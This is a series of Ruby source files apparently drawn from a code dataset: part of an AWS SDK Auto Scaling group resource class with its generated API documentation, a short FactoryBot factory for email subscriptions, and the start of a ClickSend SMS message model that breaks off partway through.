# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. The waiting condition is
# set by passing a block to {#wait_until}:
#
# # poll for ~25 seconds
# resource.wait_until(max_attempts:5,delay:5) {|resource|...}
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# # poll for 1 hour, instead of a number of attempts
# proc = Proc.new do |attempts, response|
# throw :failure if Time.now - started_at > 3600
# end
#
# # disable max attempts
# instance.wait_until(before_wait:proc, max_attempts:nil) {...}
#
# ## Handling Errors
#
# When a waiter is successful, it returns the Resource. When a waiter
# fails, it raises an error.
#
# begin
# resource.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# @yieldparam [Resource] resource to be used in the waiting condition.
#
# @raise [Aws::Waiters::Errors::FailureStateError] Raised when the waiter
# terminates because the waiter has entered a state that it will not
# transition out of, preventing success.
#
# yet successful.
#
# @raise [Aws::Waiters::Errors::UnexpectedError] Raised when an error is
# encountered while polling for a resource that is not expected.
#
# @raise [NotImplementedError] Raised when the resource does not
#
# @option options [Integer] :max_attempts (10) Maximum number of
# attempts
# @option options [Integer] :delay (10) Delay between each
# attempt in seconds
# @option options [Proc] :before_attempt (nil) Callback
# invoked before each attempt
# @option options [Proc] :before_wait (nil) Callback
# invoked before each wait
# @return [Resource] if the waiter was successful
def wait_until(options = {}, &block)
self_copy = self.dup
attempts = 0
options[:max_attempts] = 10 unless options.key?(:max_attempts)
options[:delay] ||= 10
options[:poller] = Proc.new do
attempts += 1
if block.call(self_copy)
[:success, self_copy]
else
self_copy.reload unless attempts == options[:max_attempts]
:retry
end
end
Aws::Waiters::Waiter.new(options).wait({})
end
# @!group Actions
# @example Request syntax with placeholder values
#
# auto_scaling_group.attach_instances({
# instance_ids: ["XmlStringMaxLen19"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :instance_ids
# The IDs of the instances. You can specify up to 20 instances.
# @return [EmptyStructure]
def attach_instances(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.attach_instances(options)
resp.data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.delete({
# force_delete: false,
# })
# @param [Hash] options ({})
# @option options [Boolean] :force_delete
# Specifies that the group is to be deleted along with all instances
# associated with the group, without waiting for all instances to be
# terminated. This parameter also deletes any lifecycle actions
# associated with the group.
# @return [EmptyStructure]
def delete(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.delete_auto_scaling_group(options)
resp.data
end
# @example Request syntax with placeholder values
#
# activity = auto_scaling_group.detach_instances({
# instance_ids: ["XmlStringMaxLen19"],
# should_decrement_desired_capacity: false, # required
# })
# @param [Hash] options ({})
# @option options [Array<String>] :instance_ids
# The IDs of the instances. You can specify up to 20 instances.
# @option options [required, Boolean] :should_decrement_desired_capacity
# Indicates whether the Auto Scaling group decrements the desired
# capacity value by the number of instances detached.
# @return [Activity::Collection]
def detach_instances(options = {})
batch = []
options = options.merge(auto_scaling_group_name: @name)
resp = @client.detach_instances(options)
resp.data.activities.each do |a|
batch << Activity.new(
id: a.activity_id,
data: a,
client: @client
)
end
Activity::Collection.new([batch], size: batch.size)
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.disable_metrics_collection({
# metrics: ["XmlStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :metrics
# Specifies one or more of the following metrics:
#
# * `GroupMinSize`
#
# * `GroupMaxSize`
#
# * `GroupDesiredCapacity`
#
# * `GroupInServiceInstances`
#
# * `GroupPendingInstances`
#
# * `GroupStandbyInstances`
#
# * `GroupTerminatingInstances`
#
# * `GroupTotalInstances`
#
# * `GroupInServiceCapacity`
#
# * `GroupPendingCapacity`
#
# * `GroupStandbyCapacity`
#
# * `GroupTerminatingCapacity`
#
# * `GroupTotalCapacity`
#
# If you omit this parameter, all metrics are disabled.
# @return [EmptyStructure]
def disable_metrics_collection(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.disable_metrics_collection(options)
resp.data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.enable_metrics_collection({
# metrics: ["XmlStringMaxLen255"],
# granularity: "XmlStringMaxLen255", # required
# })
# @param [Hash] options ({})
# @option options [Array<String>] :metrics
# Specifies which group-level metrics to start collecting. You can
# specify one or more of the following metrics:
#
# * `GroupMinSize`
#
# * `GroupMaxSize`
#
# * `GroupDesiredCapacity`
#
# * `GroupInServiceInstances`
#
# * `GroupPendingInstances`
#
# * `GroupStandbyInstances`
#
# * `GroupTerminatingInstances`
#
# * `GroupTotalInstances`
#
# The instance weighting feature supports the following additional
# metrics:
#
# * `GroupInServiceCapacity`
#
# * `GroupPendingCapacity`
#
# * `GroupStandbyCapacity`
#
# * `GroupTerminatingCapacity`
#
# * `GroupTotalCapacity`
#
# If you omit this parameter, all metrics are enabled.
# @option options [required, String] :granularity
# The granularity to associate with the metrics to collect. The only
# valid value is `1Minute`.
# @return [EmptyStructure]
def enable_metrics_collection(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.enable_metrics_collection(options)
resp.data
end
# @example Request syntax with placeholder values
#
# scalingpolicy = auto_scaling_group.put_scaling_policy({
# policy_name: "XmlStringMaxLen255", # required
# policy_type: "XmlStringMaxLen64",
# adjustment_type: "XmlStringMaxLen255",
# min_adjustment_step: 1,
# min_adjustment_magnitude: 1,
# scaling_adjustment: 1,
# cooldown: 1,
# metric_aggregation_type: "XmlStringMaxLen32",
# step_adjustments: [
# {
# metric_interval_lower_bound: 1.0,
# metric_interval_upper_bound: 1.0,
# scaling_adjustment: 1, # required
# },
# ],
# estimated_instance_warmup: 1,
# target_tracking_configuration: {
# predefined_metric_specification: {
# predefined_metric_type: "ASGAverageCPUUtilization", # required, accepts ASGAverageCPUUtilization, ASGAverageNetworkIn, ASGAverageNetworkOut, ALBRequestCountPerTarget
# resource_label: "XmlStringMaxLen1023",
# },
# customized_metric_specification: {
# metric_name: "MetricName", # required
# namespace: "MetricNamespace", # required
# dimensions: [
# {
# name: "MetricDimensionName", # required
# value: "MetricDimensionValue", # required
# },
# ],
# statistic: "Average", # required, accepts Average, Minimum, Maximum, SampleCount, Sum
# unit: "MetricUnit",
# },
# target_value: 1.0, # required
# disable_scale_in: false,
# },
# enabled: false,
# })
# @param [Hash] options ({})
# @option options [required, String] :policy_name
# The name of the policy.
# @option options [String] :policy_type
# One of the following policy types:
#
# * `TargetTrackingScaling`
#
# * `StepScaling`
#
# * `SimpleScaling` (default)
# @option options [String] :adjustment_type
# Specifies how the scaling adjustment is interpreted (for example, an
# absolute number or a percentage). The valid values are
# `ChangeInCapacity`, `ExactCapacity`, and `PercentChangeInCapacity`.
#
# Required if the policy type is `StepScaling` or `SimpleScaling`. For
# more information, see [Scaling adjustment types][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scaling-simple-step.html#as-scaling-adjustment
# @option options [Integer] :min_adjustment_step
# Available for backward compatibility. Use `MinAdjustmentMagnitude`
# instead.
# @option options [Integer] :min_adjustment_magnitude
# The minimum value to scale by when the adjustment type is
# `PercentChangeInCapacity`. For example, suppose that you create a step
# scaling policy to scale out an Auto Scaling group by 25 percent and
# you specify a `MinAdjustmentMagnitude` of 2. If the group has 4
# instances and the scaling policy is performed, 25 percent of 4 is 1.
# However, because you specified a `MinAdjustmentMagnitude` of 2, Amazon
# EC2 Auto Scaling scales out the group by 2 instances.
#
# Valid only if the policy type is `StepScaling` or `SimpleScaling`. For
# more information, see [Scaling adjustment types][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
# <note markdown="1"> Some Auto Scaling groups use instance weights. In this case, set the
# `MinAdjustmentMagnitude` to a value that is at least as large as your
# largest instance weight.
#
# </note>
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scaling-simple-step.html#as-scaling-adjustment
# @option options [Integer] :scaling_adjustment
# The amount by which to scale, based on the specified adjustment type.
# A positive value adds to the current capacity while a negative number
# removes from the current capacity. For exact capacity, you must
# specify a positive value.
#
# Required if the policy type is `SimpleScaling`. (Not used with any
# other policy type.)
# @option options [Integer] :cooldown
# The duration of the policy's cooldown period, in seconds. When a
# cooldown period is specified here, it overrides the default cooldown
# period defined for the Auto Scaling group.
#
# Valid only if the policy type is `SimpleScaling`. For more
# information, see [Scaling cooldowns for Amazon EC2 Auto Scaling][1] in
# the *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/Cooldown.html
# @option options [String] :metric_aggregation_type
# The aggregation type for the CloudWatch metrics. The valid values are
# `Minimum`, `Maximum`, and `Average`. If the aggregation type is null,
# the value is treated as `Average`.
#
# Valid only if the policy type is `StepScaling`.
# @option options [Array<Types::StepAdjustment>] :step_adjustments
# A set of adjustments that enable you to scale based on the size of the
# alarm breach.
#
# Required if the policy type is `StepScaling`. (Not used with any other
# policy type.)
# @option options [Integer] :estimated_instance_warmup
# The estimated time, in seconds, until a newly launched instance can
# contribute to the CloudWatch metrics. If not provided, the default is
# to use the value from the default cooldown period for the Auto Scaling
# group.
#
# Valid only if the policy type is `TargetTrackingScaling` or
# `StepScaling`.
# @option options [Types::TargetTrackingConfiguration] :target_tracking_configuration
# A target tracking scaling policy. Includes support for predefined or
# customized metrics.
#
# The following predefined metrics are available:
#
# * `ASGAverageCPUUtilization`
#
# * `ASGAverageNetworkIn`
#
# * `ASGAverageNetworkOut`
#
# * `ALBRequestCountPerTarget`
#
# If you specify `ALBRequestCountPerTarget` for the metric, you must
# specify the `ResourceLabel` parameter with the
# `PredefinedMetricSpecification`.
#
# For more information, see [TargetTrackingConfiguration][1] in the
# *Amazon EC2 Auto Scaling API Reference*.
#
# Required if the policy type is `TargetTrackingScaling`.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/APIReference/API_TargetTrackingConfiguration.html
# @option options [Boolean] :enabled
# Indicates whether the scaling policy is enabled or disabled. The
# default is enabled. For more information, see [Disabling a scaling
# policy for an Auto Scaling group][1] in the *Amazon EC2 Auto Scaling
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-enable-disable-scaling-policy.html
# @return [ScalingPolicy]
def put_scaling_policy(options = {})
options = options.merge(auto_scaling_group_name: @name)
@client.put_scaling_policy(options)
ScalingPolicy.new(
name: options[:policy_name],
client: @client
)
end
# @example Request syntax with placeholder values
#
# scheduledaction = auto_scaling_group.put_scheduled_update_group_action({
# scheduled_action_name: "XmlStringMaxLen255", # required
# time: Time.now,
# start_time: Time.now,
# end_time: Time.now,
# recurrence: "XmlStringMaxLen255",
# min_size: 1,
# max_size: 1,
# desired_capacity: 1,
# })
# @param [Hash] options ({})
# @option options [required, String] :scheduled_action_name
# The name of this scaling action.
# @option options [Time,DateTime,Date,Integer,String] :time
# This parameter is no longer used.
# @option options [Time,DateTime,Date,Integer,String] :start_time
# The date and time for this action to start, in YYYY-MM-DDThh:mm:ssZ
# format in UTC/GMT only and in quotes (for example,
# `"2019-06-01T00:00:00Z"`).
#
# If you specify `Recurrence` and `StartTime`, Amazon EC2 Auto Scaling
# performs the action at this time, and then performs the action based
# on the specified recurrence.
#
# If you try to schedule your action in the past, Amazon EC2 Auto
# Scaling returns an error message.
# @option options [Time,DateTime,Date,Integer,String] :end_time
# The date and time for the recurring schedule to end. Amazon EC2 Auto
# Scaling does not perform the action after this time.
# @option options [String] :recurrence
# The recurring schedule for this action, in Unix cron syntax format.
# This format consists of five fields separated by white spaces:
# \[Minute\] \[Hour\] \[Day\_of\_Month\] \[Month\_of\_Year\]
# \[Day\_of\_Week\]. The value must be in quotes (for example, `"30 0 1
# 1,6,12 *"`). For more information about this format, see [Crontab][1].
#
# When `StartTime` and `EndTime` are specified with `Recurrence`, they
# form the boundaries of when the recurring action starts and stops.
#
#
#
# [1]: http://crontab.org
# @option options [Integer] :min_size
# The minimum size of the Auto Scaling group.
# @option options [Integer] :max_size
# The maximum size of the Auto Scaling group.
# @option options [Integer] :desired_capacity
# The desired capacity is the initial capacity of the Auto Scaling group
# after the scheduled action runs and the capacity it attempts to
# maintain. It can scale beyond this capacity if you add more scaling
# conditions.
# @return [ScheduledAction]
def put_scheduled_update_group_action(options = {})
options = options.merge(auto_scaling_group_name: @name)
@client.put_scheduled_update_group_action(options)
ScheduledAction.new(
name: options[:scheduled_action_name],
client: @client
)
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.resume_processes({
# scaling_processes: ["XmlStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :scaling_processes
# One or more of the following processes:
#
# * `Launch`
#
# * `Terminate`
#
# * `AddToLoadBalancer`
#
# * `AlarmNotification`
#
# * `AZRebalance`
#
# * `HealthCheck`
#
# * `InstanceRefresh`
#
# * `ReplaceUnhealthy`
#
# * `ScheduledActions`
#
# If you omit this parameter, all processes are specified.
# @return [EmptyStructure]
def resume_processes(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.resume_processes(options)
resp.data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.set_desired_capacity({
# desired_capacity: 1, # required
# honor_cooldown: false,
# })
# @param [Hash] options ({})
# @option options [required, Integer] :desired_capacity
# The desired capacity is the initial capacity of the Auto Scaling group
# after this operation completes and the capacity it attempts to
# maintain.
# @option options [Boolean] :honor_cooldown
# Indicates whether Amazon EC2 Auto Scaling waits for the cooldown
# period to complete before initiating a scaling activity to set your
# Auto Scaling group to its new capacity. By default, Amazon EC2 Auto
# Scaling does not honor the cooldown period during manual scaling
# activities.
# @return [EmptyStructure]
def set_desired_capacity(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.set_desired_capacity(options)
resp.data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.suspend_processes({
# scaling_processes: ["XmlStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :scaling_processes
# One or more of the following processes:
#
# * `Launch`
#
# * `Terminate`
#
# * `AddToLoadBalancer`
#
# * `AlarmNotification`
#
# * `AZRebalance`
#
# * `HealthCheck`
#
# * `InstanceRefresh`
#
# * `ReplaceUnhealthy`
#
# * `ScheduledActions`
#
# If you omit this parameter, all processes are specified.
# @return [EmptyStructure]
def suspend_processes(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.suspend_processes(options)
resp.data
end
# @example Request syntax with placeholder values
#
# autoscalinggroup = auto_scaling_group.update({
# launch_configuration_name: "XmlStringMaxLen255",
# launch_template: {
# launch_template_id: "XmlStringMaxLen255",
# launch_template_name: "LaunchTemplateName",
# version: "XmlStringMaxLen255",
# },
# mixed_instances_policy: {
# launch_template: {
# launch_template_specification: {
# launch_template_id: "XmlStringMaxLen255",
# launch_template_name: "LaunchTemplateName",
# version: "XmlStringMaxLen255",
# },
# overrides: [
# {
# instance_type: "XmlStringMaxLen255",
# weighted_capacity: "XmlStringMaxLen32",
# launch_template_specification: {
# launch_template_id: "XmlStringMaxLen255",
# launch_template_name: "LaunchTemplateName",
# version: "XmlStringMaxLen255",
# },
# },
# ],
# },
# instances_distribution: {
# on_demand_allocation_strategy: "XmlString",
# on_demand_base_capacity: 1,
# on_demand_percentage_above_base_capacity: 1,
# spot_allocation_strategy: "XmlString",
# spot_instance_pools: 1,
# spot_max_price: "MixedInstanceSpotPrice",
# },
# },
# min_size: 1,
# max_size: 1,
# desired_capacity: 1,
# default_cooldown: 1,
# availability_zones: ["XmlStringMaxLen255"],
# health_check_type: "XmlStringMaxLen32",
# health_check_grace_period: 1,
# placement_group: "XmlStringMaxLen255",
# vpc_zone_identifier: "XmlStringMaxLen2047",
# termination_policies: ["XmlStringMaxLen1600"],
# new_instances_protected_from_scale_in: false,
# service_linked_role_arn: "ResourceName",
# max_instance_lifetime: 1,
# capacity_rebalance: false,
# })
# @param [Hash] options ({})
# @option options [String] :launch_configuration_name
# The name of the launch configuration. If you specify
# `LaunchConfigurationName` in your update request, you can't specify
# `LaunchTemplate` or `MixedInstancesPolicy`.
# @option options [Types::LaunchTemplateSpecification] :launch_template
# The launch template and version to use to specify the updates. If you
# specify `LaunchTemplate` in your update request, you can't specify
# `LaunchConfigurationName` or `MixedInstancesPolicy`.
# @option options [Types::MixedInstancesPolicy] :mixed_instances_policy
# An embedded object that specifies a mixed instances policy. When you
# make changes to an existing policy, all optional parameters are left
# unchanged if not specified. For more information, see [Auto Scaling
# groups with multiple instance types and purchase options][1] in the
# *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/asg-purchase-options.html
# @option options [Integer] :min_size
# The minimum size of the Auto Scaling group.
# @option options [Integer] :max_size
# The maximum size of the Auto Scaling group.
#
# <note markdown="1"> With a mixed instances policy that uses instance weighting, Amazon EC2
# Auto Scaling may need to go above `MaxSize` to meet your capacity
# requirements. In this event, Amazon EC2 Auto Scaling will never go
# above `MaxSize` by more than your largest instance weight (weights
# that define how many units each instance contributes to the desired
# capacity of the group).
#
# </note>
# @option options [Integer] :desired_capacity
# The desired capacity is the initial capacity of the Auto Scaling group
# after this operation completes and the capacity it attempts to
# maintain. This number must be greater than or equal to the minimum
# size of the group and less than or equal to the maximum size of the
# group.
# @option options [Integer] :default_cooldown
# The amount of time, in seconds, after a scaling activity completes
# before another scaling activity can start. The default value is `300`.
# This setting applies when using simple scaling policies, but not when
# using other scaling policies or scheduled scaling. For more
# information, see [Scaling cooldowns for Amazon EC2 Auto Scaling][1] in
# the *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/Cooldown.html
# @option options [Array<String>] :availability_zones
# One or more Availability Zones for the group.
# @option options [String] :health_check_type
# The service to use for the health checks. The valid values are `EC2`
# and `ELB`. If you configure an Auto Scaling group to use ELB health
# checks, it considers the instance unhealthy if it fails either the EC2
# status checks or the load balancer health checks.
# @option options [Integer] :health_check_grace_period
# The amount of time, in seconds, that Amazon EC2 Auto Scaling waits
# before checking the health status of an EC2 instance that has come
# into service. The default value is `0`. For more information, see
# [Health check grace period][1] in the *Amazon EC2 Auto Scaling User
# Guide*.
#
# Conditional: Required if you are adding an `ELB` health check.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/healthcheck.html#health-check-grace-period
# @option options [String] :placement_group
# The name of an existing placement group into which to launch your
# instances, if any. A placement group is a logical grouping of
# instances within a single Availability Zone. You cannot specify
# multiple Availability Zones and a placement group. For more
# information, see [Placement Groups][1] in the *Amazon EC2 User Guide
# for Linux Instances*.
#
#
#
# [1]: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/placement-groups.html
# @option options [String] :vpc_zone_identifier
# A comma-separated list of subnet IDs for a virtual private cloud
# (VPC). If you specify `VPCZoneIdentifier` with `AvailabilityZones`,
# the subnets that you specify for this parameter must reside in those
# Availability Zones.
# @option options [Array<String>] :termination_policies
# A policy or a list of policies that are used to select the instances
# to terminate. The policies are executed in the order that you list
# them. For more information, see [Controlling which Auto Scaling
# instances terminate during scale in][1] in the *Amazon EC2 Auto
# Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-termination.html
# @option options [Boolean] :new_instances_protected_from_scale_in
# Indicates whether newly launched instances are protected from
# termination by Amazon EC2 Auto Scaling when scaling in. For more
# information about preventing instances from terminating on scale in,
# see [Instance scale-in protection][1] in the *Amazon EC2 Auto Scaling
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-termination.html#instance-protection
# @option options [String] :service_linked_role_arn
# The Amazon Resource Name (ARN) of the service-linked role that the
# Auto Scaling group uses to call other AWS services on your behalf. For
# more information, see [Service-linked roles][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/autoscaling-service-linked-role.html
# @option options [Integer] :max_instance_lifetime
# The maximum amount of time, in seconds, that an instance can be in
# service. The default is null. If specified, the value must be either 0
# or a number equal to or greater than 86,400 seconds (1 day). To clear
# a previously set value, specify a new value of 0. For more
# information, see [Replacing Auto Scaling instances based on maximum
# instance lifetime][1] in the *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/asg-max-instance-lifetime.html
# @option options [Boolean] :capacity_rebalance
# Enables or disables Capacity Rebalancing. For more information, see
# [Amazon EC2 Auto Scaling Capacity Rebalancing][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/capacity-rebalance.html
# @return [AutoScalingGroup]
def update(options = {})
options = options.merge(auto_scaling_group_name: @name)
@client.update_auto_scaling_group(options)
AutoScalingGroup.new(
name: options[:auto_scaling_group_name],
client: @client
)
end
# @!group Associations
# @example Request syntax with placeholder values
#
# activities = auto_scaling_group.activities({
# activity_ids: ["XmlString"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :activity_ids
# The activity IDs of the desired scaling activities. You can specify up
# to 50 IDs. If you omit this parameter, all activities for the past six
# weeks are described. If unknown activities are requested, they are
# ignored with no error. If you specify an Auto Scaling group, the
# results are limited to that group.
# @return [Activity::Collection]
def activities(options = {})
batches = Enumerator.new do |y|
options = options.merge(auto_scaling_group_name: @name)
resp = @client.describe_scaling_activities(options)
resp.each_page do |page|
batch = []
page.data.activities.each do |a|
batch << Activity.new(
id: a.activity_id,
data: a,
client: @client
)
end
y.yield(batch)
end
end
Activity::Collection.new(batches)
end
# @return [Instance::Collection]
def instances
batch = []
data[:instances].each do |d|
batch << Instance.new(
group_name: @name,
id: d[:instance_id],
data: d,
client: @client
)
end
Instance::Collection.new([batch], size: batch.size)
end
# @return [LaunchConfiguration, nil]
def launch_configuration
if data[:launch_configuration_name]
LaunchConfiguration.new(
name: data[:launch_configuration_name],
client: @client
)
else
nil
end
end
# @param [String] name
# @return [LifecycleHook]
def lifecycle_hook(name)
LifecycleHook.new(
group_name: @name,
name: name,
client: @client
)
end
# @example Request syntax with placeholder values
#
# lifecycle_hooks = auto_scaling_group.lifecycle_hooks({
# lifecycle_hook_names: ["AsciiStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :lifecycle_hook_names
# The names of one or more lifecycle hooks. If you omit this parameter,
# all lifecycle hooks are described.
# @return [LifecycleHook::Collection]
def lifecycle_hooks(options = {})
batches = Enumerator.new do |y|
batch = []
options = options.merge(auto_scaling_group_name: @name)
resp = @client.describe_lifecycle_hooks(options)
resp.data.lifecycle_hooks.each do |l|
batch << LifecycleHook.new(
group_name: l.auto_scaling_group_name,
name: l.lifecycle_hook_name,
data: l,
client: @client
)
end
y.yield(batch)
end
LifecycleHook::Collection.new(batches)
end
# @param [String] name
# @return [LoadBalancer]
def load_balancer(name)
LoadBalancer.new(
group_name: @name,
name: name,
client: @client
)
end
# @example Request syntax with placeholder values
#
# load_balancers = auto_scaling_group.load_balancers({
# next_token: "XmlString",
# max_records: 1,
# })
# @param [Hash] options ({})
# @option options [String] :next_token
# The token for the next set of items to return. (You received this
# token from a previous call.)
# @option options [Integer] :max_records
# The maximum number of items to return with this call. The default
# value is `100` and the maximum value is `100`.
# @return [LoadBalancer::Collection]
def load_balancers(options = {})
batches = Enumerator.new do |y|
batch = []
options = options.merge(auto_scaling_group_name: @name)
resp = @client.describe_load_balancers(options)
resp.data.load_balancers.each do |l|
batch << LoadBalancer.new(
group_name: @name,
name: l.load_balancer_name,
data: l,
client: @client
)
end
y.yield(batch)
end
LoadBalancer::Collection.new(batches)
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.notification_configurations()
# @param [Hash] options ({})
# @return [NotificationConfiguration::Collection]
def notification_configurations(options = {})
batches = Enumerator.new do |y|
options = Aws::Util.deep_merge(options, auto_scaling_group_names: [@name])
resp = @client.describe_notification_configurations(options)
resp.each_page do |page|
batch = []
page.data.notification_configurations.each do |n|
batch << NotificationConfiguration.new(
group_name: n.auto_scaling_group_name,
type: n.notification_type,
topic_arn: n.topic_arn,
data: n,
client: @client
)
end
y.yield(batch)
end
end
NotificationConfiguration::Collection.new(batches)
end
# @example Request syntax with placeholder values
#
# policies = auto_scaling_group.policies({
# policy_names: ["ResourceName"],
# policy_types: ["XmlStringMaxLen64"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :policy_names
# The names of one or more policies. If you omit this parameter, all
# policies are described. If a group name is provided, the results are
# limited to that group. This list is limited to 50 items. If you
# specify an unknown policy name, it is ignored with no error.
# @option options [Array<String>] :policy_types
# One or more policy types. The valid values are `SimpleScaling`,
# `StepScaling`, and `TargetTrackingScaling`.
# @return [ScalingPolicy::Collection]
def policies(options = {})
batches = Enumerator.new do |y|
options = options.merge(auto_scaling_group_name: @name)
resp = @client.describe_policies(options)
resp.each_page do |page|
batch = []
page.data.scaling_policies.each do |s|
batch << ScalingPolicy.new(
name: s.policy_name,
data: s,
client: @client
)
end
y.yield(batch)
end
end
ScalingPolicy::Collection.new(batches)
end
# @example Request syntax with placeholder values
#
# scheduled_actions = auto_scaling_group.scheduled_actions({
# scheduled_action_names: ["XmlStringMaxLen255"],
# start_time: Time.now,
# end_time: Time.now,
# })
# @param [Hash] options ({})
# @option options [Array<String>] :scheduled_action_names
# The names of one or more scheduled actions. You can specify up to 50
# actions. If you omit this parameter, all scheduled actions are
# described. If you specify an unknown scheduled action, it is ignored
# with no error.
# @option options [Time,DateTime,Date,Integer,String] :start_time
# The earliest scheduled start time to return. If scheduled action names
# are provided, this parameter is ignored.
# @option options [Time,DateTime,Date,Integer,String] :end_time
# The latest scheduled start time to return. If scheduled action names
# are provided, this parameter is ignored.
# @return [ScheduledAction::Collection]
def scheduled_actions(options = {})
batches = Enumerator.new do |y|
options = options.merge(auto_scaling_group_name: @name)
resp = @client.describe_scheduled_actions(options)
resp.each_page do |page|
batch = []
page.data.scheduled_update_group_actions.each do |s|
batch << ScheduledAction.new(
name: s.scheduled_action_name,
data: s,
client: @client
)
end
y.yield(batch)
end
end
ScheduledAction::Collection.new(batches)
end
# @param [String] key
# @return [Tag]
def tag(key)
Tag.new(
key: key,
resource_id: @name,
resource_type: "auto-scaling-group",
client: @client
)
end
# @return [Tag::Collection]
def tags
batch = []
data[:tags].each do |d|
batch << Tag.new(
key: d[:key],
resource_id: d[:resource_id],
resource_type: d[:resource_type],
data: d,
client: @client
)
end
Tag::Collection.new([batch], size: batch.size)
end
# @deprecated
# @api private
def identifiers
{ name: @name }
end
deprecated(:identifiers)
private
def extract_name(args, options)
value = args[0] || options.delete(:name)
case value
when String then value
when nil then raise ArgumentError, "missing required option :name"
else
msg = "expected :name to be a String, got #{value.class}"
raise ArgumentError, msg
end
end
def yield_waiter_and_warn(waiter, &block)
if !@waiter_block_warned
msg = "pass options to configure the waiter; "\
"yielding the waiter is deprecated"
warn(msg)
@waiter_block_warned = true
end
yield(waiter.waiter)
end
def separate_params_and_options(options)
opts = Set.new(
[:client, :max_attempts, :delay, :before_attempt, :before_wait]
)
waiter_opts = {}
waiter_params = {}
options.each_pair do |key, value|
if opts.include?(key)
waiter_opts[key] = value
else
waiter_params[key] = value
end
end
waiter_opts[:client] ||= @client
[waiter_opts, waiter_params]
end
class Collection < Aws::Resources::Collection; end
end
end
| 35.431965 | 179 | 0.638505 |
87dd1b591d2b89b6c051972ec4688541980ef15b | 173 | FactoryBot.define do
factory :email_subscription do
oidc_user
sequence(:name) { |n| "subscription-#{n}" }
sequence(:topic_slug) { |n| "topic-#{n}" }
end
end
| 21.625 | 47 | 0.641618 |
017582375bfd6a6f4c4e522065489f532b2abf06 | 3,183 | # This file was automatically generated for ClickSend by APIMATIC v2.0 ( https://apimatic.io ).
module ClickSend
class SmsMessage < BaseModel
# Your method of sending e.g. 'wordpress', 'php', 'c#'.
# @return [String]
attr_accessor :source
# Your sender id - more info: http://help.clicksend.com/SMS/what-is-a-sender-id-or-sender-number.
# @return [String]
attr_accessor :from
# Your message.
# @return [String]
attr_accessor :body
# Recipient phone number in E.164 format.
# @return [String]
attr_accessor :to
# Leave blank for immediate delivery. Your schedule time in unix format http://help.clicksend.com/what-is-a-unix-timestamp
# @return [Integer]
attr_accessor :schedule
# Your reference. Will be passed back with all replies and delivery reports.
# @return [String]
attr_accessor :custom_string
# Your list ID if sending to a whole list. Can be used instead of 'to'.
# @return [Integer]
attr_accessor :list_id
# Recipient country.
# @return [String]
attr_accessor :country
# An email address where the reply should be emailed to. If omitted, the reply will be emailed back to the user who sent the outgoing SMS.
# @return [String]
attr_accessor :from_email
# A mapping from model property names to API property names
def self.names
if @_hash.nil?
@_hash = {}
@_hash["source"] = "source"
@_hash["from"] = "from"
@_hash["body"] = "body"
@_hash["to"] = "to"
@_hash["schedule"] = "schedule"
@_hash["custom_string"] = "custom_string"
@_hash["list_id"] = "list_id"
@_hash["country"] = "country"
@_hash["from_email"] = "from_email"
end
@_hash
end
def initialize(source = nil,
from = nil,
body = nil,
to = nil,
schedule = nil,
custom_string = nil,
list_id = nil,
country = nil,
from_email = nil)
@source = source
@from = from
@body = body
@to = to
@schedule = schedule
@custom_string = custom_string
@list_id = list_id
@country = country
@from_email = from_email
end
# Creates an instance of the object from a hash
def self.from_hash(hash)
return nil unless hash
# Extract variables from the hash
source = hash['source']
from = hash['from']
body = hash['body']
to = hash['to']
schedule = hash['schedule']
custom_string = hash['custom_string']
list_id = hash['list_id']
country = hash['country']
from_email = hash['from_email']
# Create object from extracted values
SmsMessage.new(source,
from,
body,
to,
schedule,
custom_string,
list_id,
country,
